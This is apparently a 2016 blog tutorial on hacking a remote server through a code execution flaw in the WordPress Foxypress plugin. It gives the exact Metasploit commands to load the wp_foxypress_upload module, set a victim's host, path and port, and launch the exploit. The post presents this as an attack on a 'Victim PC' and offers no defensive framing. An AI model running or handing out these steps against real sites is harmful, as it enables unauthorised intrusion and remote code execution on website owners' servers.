Hack Remote Server using WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution

at 7:34 AM Monday, May 9, 2016
This module exploits an arbitrary PHP code execution flaw in the WordPress blogging software plugin known as Foxypress. The vulnerability allows for arbitrary file upload and remote code execution via the uploadify.php script. The Foxypress plugin versions 0.4.1.1 to 0.4.2.1 are vulnerable.

Exploit Targets
Foxypress plugin versions 0.4.1.1 to 0.4.2.1

Requirement
Attacker: kali Linux
Victim PC: Foxypress plugin


Open Kali terminal type msfconsole


Now type use exploit/unix/webapp/wp_foxypress_upload
msf exploit (wp_foxypress_upload)>set targeturi /wordpress
msf exploit (wp_foxypress_upload)>set rhost 192.168.0.105 (IP of Remote Host)
msf exploit (wp_foxypress_upload)>set rport 80
msf exploit (wp_foxypress_upload)>exploit         

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)